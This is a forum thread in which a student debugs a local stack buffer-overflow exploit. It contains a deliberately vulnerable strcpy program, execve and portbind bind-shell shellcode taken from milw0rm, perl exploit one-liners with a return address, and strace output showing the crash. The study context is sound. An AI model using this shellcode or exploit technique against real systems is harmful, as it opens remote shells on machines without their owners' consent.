Results 1 to 2 of 2

Thread: Problems with shellcode

  1. #1
    Just burned his ISO
    Join Date
    Oct 2009
    Posts
    1

    Question Problems with shellcode

    Hi there,
    I'm new to this forum and I hope I can get some help here (and of course I hope I can help other people :-) ). Let's come to the topic:

    I'm playing around with buffer overflows because of a project at university.
    What I am trying to do is to exploit a really stupid selfwritter server remotely.

    The problem is the shellcode, which I did not write myself (shame on me ) but I found on milw0rm. To avoid complications beause of the network I'm now trying local buffer overflows first:

    [code]
    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>

    void A(char * args) {
    char buffer[128];
    printf("Adresse von buffer: %x\n\n", buffer);
    memset(buffer, 'B', sizeof(buffer));
    strcpy(buffer, args);
    printf("\nbuff: [%s] (%p)(%d/%d)\n\n", &buffer, buffer, sizeof(buffer), strlen(buffer));
    }

    int main(int argc, char * argv[]) {
    A(argv[1]);
    return 0;
    }
    [code]

    That one works fine with a stupid execve shellcode like this (that was for a smaller buffer...):
    [code]
    ./target `perl -e '{ print "\x90\x90\x90\x90\xeb\x14\x5b\x31\xc0\x99\x88\x43\ x07\x89\x5b\x08\x89\x43\x0c\x8d\x4b\x08\xb0\x0b\xc d\x80\xe8\xe7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\ x68"; print "AAAAAA"; print "\x40\xf8\xff\xbf"; }'`
    [code]

    Now I'm trying this shellcode:
    [code]
    /*
    * linux-x86-portbind.c - portbind shellcode 86 bytes for Linux/x86
    * Copyright (c) 2006 Gotfault Security <xgc@gotfault.net>
    *
    * portbind shellcode that bind()'s a shell on port 64713/tcp
    *
    */

    char shellcode[] =

    /* socket(AF_INET, SOCK_STREAM, 0) */

    "\x6a\x66" // push $0x66
    "\x58" // pop %eax
    "\x6a\x01" // push $0x1
    "\x5b" // pop %ebx
    "\x99" // cltd
    "\x52" // push %edx
    "\x53" // push %ebx
    "\x6a\x02" // push $0x2
    "\x89\xe1" // mov %esp,%ecx
    "\xcd\x80" // int $0x80

    /* bind(s, server, sizeof(server)) */

    "\x52" // push %edx
    "\x66\x68\xfc\xc9" // pushw $0xc9fc // PORT = 64713
    "\x66\x6a\x02" // pushw $0x2
    "\x89\xe1" // mov $esp,%ecx
    "\x6a\x10" // push $0x10
    "\x51" // push %ecx
    "\x50" // push %eax
    "\x89\xe1" // mov %esp,%ecx
    "\x89\xc6" // mov %eax,%esi
    "\x43" // inc %ebx
    "\xb0\x66" // mov $0x66,%al
    "\xcd\x80" // int $0x80

    /* listen(s, anything) */

    "\xb0\x66" // mov $0x66,%al
    "\xd1\xe3" // shl %ebx
    "\xcd\x80" // int $0x80

    /* accept(s, 0, 0) */

    "\x52" // push %edx
    "\x56" // push %esi
    "\x89\xe1" // mov %esp,%ecx
    "\x43" // inc %ebx
    "\xb0\x66" // mov $0x66,%al
    "\xcd\x80" // int $0x80

    "\x93" // xchg %eax,%ebx

    /* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */

    "\x6a\x02" // push $0x2
    "\x59" // pop %ecx

    "\xb0\x3f" // mov $0x3f,%al
    "\xcd\x80" // int $0x80
    "\x49" // dec %ecx
    "\x79\xf9" // jns dup_loop

    /* execve("/bin/sh", ["/bin/sh"], NULL) */

    "\x6a\x0b" // push $0xb
    "\x58" // pop %eax
    "\x52" // push %edx
    "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
    "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
    "\x89\xe3" // mov %esp, %ebx
    "\x52" // push %edx
    "\x53" // push %ebx
    "\x89\xe1" // mov %esp, %ecx
    "\xcd\x80"; // int $0x80

    int main() {

    int (*f)() = (int(*)())shellcode;
    printf("Length: %u\n", strlen(shellcode));
    f();
    }

    // milw0rm.com [2006-04-06]
    [code]
    If I execute that programm the shell on port 64731 works fine. But if I use that shellcode on my target, it crashes before execve():
    Code:
    pentest@****up:~$ ./testoverflow `perl -e 'print "\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89\xe1\xcd\x80\x52\x66\x68\xfc\xc9\x66\x6a\x02\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\x43\xb0\x66\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"; print "A"x46; print "\x18\xf4\xff\xbf";'`
    Adresse von buffer: bffff418
    
    
    buff: [jfXj[�RSj��̀Rfh��fj��jQP����C�f̀�f��̀RV��C�f̀�jY�?̀Iy�j
                                                                  XRh//shh/bin��RS��̀AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA���] (0xbffff418)(128/136)
    
    ^C
    pentest@****up:~$ strace ./testoverflow `perl -e 'print "\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89\xe1\xcd\x80\x52\x66\x68\xfc\xc9\x66\x6a\x02\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\x43\xb0\x66\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"; print "A"x46; print "\x18\xf4\xff\xbf";'`
    execve("./testoverflow", ["./testoverflow", "jfXj\1[\231RSj\2\211\341\315\200Rfh\374\311fj\2\211\341j\20QP\211\341\211"...], [/* 37 vars */]) = 0
    brk(0)                                  = 0x804b000
    access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
    mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fdf000
    access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
    open("/etc/ld.so.cache", O_RDONLY)      = 3
    fstat64(3, {st_mode=S_IFREG|0644, st_size=74923, ...}) = 0
    mmap2(NULL, 74923, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fcc000
    close(3)                                = 0
    access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
    open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
    read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\320h\1\0004\0\0\0\344"..., 512) = 512
    fstat64(3, {st_mode=S_IFREG|0755, st_size=1442180, ...}) = 0
    mmap2(NULL, 1451632, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e69000
    mprotect(0xb7fc5000, 4096, PROT_NONE)   = 0
    mmap2(0xb7fc6000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x15c) = 0xb7fc6000
    mmap2(0xb7fc9000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7fc9000
    close(3)                                = 0
    mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e68000
    set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e686c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
    open("/dev/urandom", O_RDONLY)          = 3
    read(3, "FN."..., 3)                    = 3
    close(3)                                = 0
    mprotect(0xb7fc6000, 8192, PROT_READ)   = 0
    mprotect(0x8049000, 4096, PROT_READ)    = 0
    mprotect(0xb7ffe000, 4096, PROT_READ)   = 0
    munmap(0xb7fcc000, 74923)               = 0
    fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
    mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fde000
    write(1, "Adresse von buffer: bffff418\n\n"..., 30Adresse von buffer: bffff418
    
    ) = 30
    write(1, "\n"..., 1
    )                    = 1
    write(1, "buff: [jfXj\1[\231RSj\2\211\341\315\200Rfh\374\311fj\2\211\341j"..., 168buff: [jfXj[�RSj��̀Rfh��fj��jQP����C�f̀�f��̀RV��C�f̀�jY�?̀Iy�j
                                                                    XRh//shh/bin��RS��̀AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA���] (0xbffff418)(128/136)
    
    ) = 168
    socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
    bind(3, {sa_family=AF_INET, sin_port=htons(64713), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
    listen(3, 3221222540)                   = 0
    accept(3, 0, 0x3)                       = 4
    dup2(4, 2)                              = 2
    dup2(4, 1)                              = 1
    dup2(4, 0)                              = 0
    --- SIGSEGV (Segmentation fault) @ 0 (0) ---
    +++ killed by SIGSEGV +++
    Does anybody have an idea how I can solve this problem. I've tried multiple shellcodes now, but no shellcode complexer than the first one works (but they all do if I call them without an overflow - weird).

    Regards,

    Seppel

  2. #2
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    Do the quoted ld.so.* files exist as shown in the error output?
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •